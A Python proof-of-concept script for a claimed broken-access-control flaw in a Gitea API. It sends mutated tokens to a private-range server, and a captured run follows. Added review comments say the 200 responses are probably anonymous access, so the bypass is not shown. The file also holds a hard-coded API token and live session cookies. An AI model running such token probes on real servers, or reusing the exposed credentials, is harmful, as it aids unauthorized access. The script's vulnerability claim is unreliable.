gitea-broken access control
import requests
import json
import time
# Target configuration (private-range address; the run in the transcript below
# was made against it)
host = "192.168.126.129"
port = 3000
base_url = "http://" + host + ":" + str(port)
# Original token from the sample.
# NOTE(review): a token committed to a public gist, and echoed verbatim in the
# transcript below, has to be treated as disclosed; rotate it on the target.
auth_token = "c3a9402a254ac8d1cd64c9847212a410a85f3735"
# Headers with the authorization token.
# NOTE(review): the value is sent bare.  Gitea's API documents the form
# `Authorization: token <value>`; without a scheme the server may handle the
# request as anonymous -- confirm against the target version before reading the
# 200s in the transcript as evidence that a mutated token was accepted.
headers = dict(Accept="application/json", Authorization=auth_token)
def print_request_response_info(response, request_description):
    """Dump one request/response pair to stdout under a titled banner.

    Args:
        response: a ``requests.Response``-like object; ``.url``,
            ``.request.headers``, ``.status_code``, ``.reason``, ``.headers``
            and ``.text`` are read.
        request_description: label printed in the ``=== ... ===`` banner.

    Note: the request headers are printed exactly as sent, so the
    Authorization value -- and any Set-Cookie the server returns -- lands in
    the transcript verbatim.  Scrub both before sharing the output.
    """
    sent_headers = json.dumps(dict(response.request.headers), indent=2)
    received_headers = json.dumps(dict(response.headers), indent=2)
    report = [
        f"\n=== {request_description} ===",
        f"Request URL: {response.url}",
        f"Request Headers: {sent_headers}",
        f"Response Status: {response.status_code} {response.reason}",
        f"Response Headers: {received_headers}",
        f"Response Body: {response.text}",
    ]
    for line in report:
        print(line)
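def test_token_patterns(*, timeout=10):
    """Send the four mutated-token requests plus a no-credential baseline.

    The four variants of ``auth_token`` are sent to
    ``/api/v1/settings/repository`` exactly as before, each printed via
    ``print_request_response_info``.  One extra request is then sent with no
    Authorization header at all.  Without that baseline a 200 for a mutated
    token shows nothing: the endpoint may not require authentication, and a
    bare token value (no ``token `` / ``Bearer`` scheme) may not be parsed as
    a credential by the server in the first place.

    Args:
        timeout: per-request timeout in seconds.  The original call had none,
            so a stalled server hung the script indefinitely.

    Returns:
        list of ``(description, status_code)`` tuples, baseline last.  The
        original returned ``None``; callers ignoring the value are unaffected.
    """
    url = f"{base_url}/api/v1/settings/repository"
    # Check if token follows common patterns
    patterns_to_test = [
        auth_token[:16] + "a" * 20,  # First half preserved (36 chars, shorter than the 40-char original)
        "a" * 16 + auth_token[16:],  # Second half preserved
        auth_token[:-1] + "0",       # Last character changed
        auth_token[0] + "a" * 39,    # First character preserved
    ]
    results = []
    for i, pattern in enumerate(patterns_to_test, start=1):
        test_headers = headers.copy()
        test_headers["Authorization"] = pattern
        response = requests.get(url, headers=test_headers, timeout=timeout)
        description = f"Token Pattern Test #{i}"
        print_request_response_info(response, description)
        results.append((description, response.status_code))

    # Baseline: same endpoint, no credential at all.  If this also returns
    # 200, the endpoint is reachable anonymously and the mutated-token
    # results are not evidence of a broken access-control check.
    baseline_description = "Baseline (no Authorization header)"
    baseline_headers = {k: v for k, v in headers.items() if k != "Authorization"}
    response = requests.get(url, headers=baseline_headers, timeout=timeout)
    print_request_response_info(response, baseline_description)
    results.append((baseline_description, response.status_code))

    if len({status for _, status in results}) == 1:
        print(
            f"\nAll requests, including the unauthenticated baseline, returned "
            f"{response.status_code}: the endpoint does not distinguish these "
            "requests, so acceptance of a mutated token is not demonstrated."
        )
    return results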
def main():
    """Script entry point: announce, run the token-pattern checks, announce completion."""
    print("Starting Extended API Vulnerability Tests...")
    # Run extended tests
    test_token_patterns()
    print("\nExtended testing completed.")


if __name__ == "__main__":
    main()
# Captured transcript of one run, kept as a bare string literal so the file
# still parses (the opening `""""` is `"""` plus a stray `"` that becomes the
# string's first character).  Reading it: all four mutated Authorization
# values got 200 OK with the same 52-byte body, and every response sets a
# fresh i_like_gitea session cookie and _csrf value.  That is consistent with
# each request being handled as a new anonymous session rather than as an
# authenticated one, so the 200s by themselves do not show a mutated token
# being accepted -- a request with no Authorization header at all is the
# control needed to tell the two apart.  The cookies and CSRF values below
# are live server output; scrub them before sharing.
""""
PS E:\论文\模糊测试\RESTAPI\LLMfuzzapi\Poc\gitea> python .\insecure_access_control.py
Starting Extended API Vulnerability Tests...
=== Token Pattern Test #1 ===
Request URL: http://192.168.126.129:3000/api/v1/settings/repository
Request Headers: {
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate, br, zstd",
"Accept": "application/json",
"Connection": "keep-alive",
"Authorization": "c3a9402a254ac8d1aaaaaaaaaaaaaaaaaaaa"
}
Response Status: 200 OK
Response Headers: {
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "lang=en-US; Path=/; Max-Age=2147483647, i_like_gitea=01177b6c81d9bf99; Path=/; HttpOnly, _csrf=xeFQQlirIj8Sqv-F6DT-y9bcqvk6MTc0OTUyMDMxMjA0NjAwMjQ1NQ; Path=/; Expires=Wed, 11 Jun 2025 01:51:52 GMT; HttpOnly",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "SAMEORIGIN",
"Date": "Tue, 10 Jun 2025 01:51:52 GMT",
"Content-Length": "52"
}
Response Body: {"mirrors_disabled":false,"http_git_disabled":false}
=== Token Pattern Test #2 ===
Request URL: http://192.168.126.129:3000/api/v1/settings/repository
Request Headers: {
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate, br, zstd",
"Accept": "application/json",
"Connection": "keep-alive",
"Authorization": "aaaaaaaaaaaaaaaacd64c9847212a410a85f3735"
}
Response Status: 200 OK
Response Headers: {
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "lang=en-US; Path=/; Max-Age=2147483647, i_like_gitea=12664da3df5f9244; Path=/; HttpOnly, _csrf=FTUPYdVzVgXlMlpdXHQ751m5GyE6MTc0OTUyMDMxMjA5MTY3NTIwMw; Path=/; Expires=Wed, 11 Jun 2025 01:51:52 GMT; HttpOnly",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "SAMEORIGIN",
"Date": "Tue, 10 Jun 2025 01:51:52 GMT",
"Content-Length": "52"
}
Response Body: {"mirrors_disabled":false,"http_git_disabled":false}
=== Token Pattern Test #3 ===
Request URL: http://192.168.126.129:3000/api/v1/settings/repository
Request Headers: {
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate, br, zstd",
"Accept": "application/json",
"Connection": "keep-alive",
"Authorization": "c3a9402a254ac8d1cd64c9847212a410a85f3730"
}
Response Status: 200 OK
Response Headers: {
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "lang=en-US; Path=/; Max-Age=2147483647, i_like_gitea=d994d223e837947c; Path=/; HttpOnly, _csrf=3oU8Xw-ND8nNxdQDOzBr8T-Ka7A6MTc0OTUyMDMxMjA5NDY5NTMzNA; Path=/; Expires=Wed, 11 Jun 2025 01:51:52 GMT; HttpOnly",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "SAMEORIGIN",
"Date": "Tue, 10 Jun 2025 01:51:52 GMT",
"Content-Length": "52"
}
Response Body: {"mirrors_disabled":false,"http_git_disabled":false}
=== Token Pattern Test #4 ===
Request URL: http://192.168.126.129:3000/api/v1/settings/repository
Request Headers: {
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate, br, zstd",
"Accept": "application/json",
"Connection": "keep-alive",
"Authorization": "caaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
Response Status: 200 OK
Response Headers: {
"Content-Type": "application/json; charset=UTF-8",
"Set-Cookie": "lang=en-US; Path=/; Max-Age=2147483647, i_like_gitea=bb3dc831b0cec08a; Path=/; HttpOnly, _csrf=589Kj0RJSztmu3YJPCbgH1Hlris6MTc0OTUyMDMxMjA5NzczMjIyOA; Path=/; Expires=Wed, 11 Jun 2025 01:51:52 GMT; HttpOnly",
"X-Content-Type-Options": "nosniff",
"X-Frame-Options": "SAMEORIGIN",
"Date": "Tue, 10 Jun 2025 01:51:52 GMT",
"Content-Length": "52"
}
Response Body: {"mirrors_disabled":false,"http_git_disabled":false}
Extended testing completed.
"""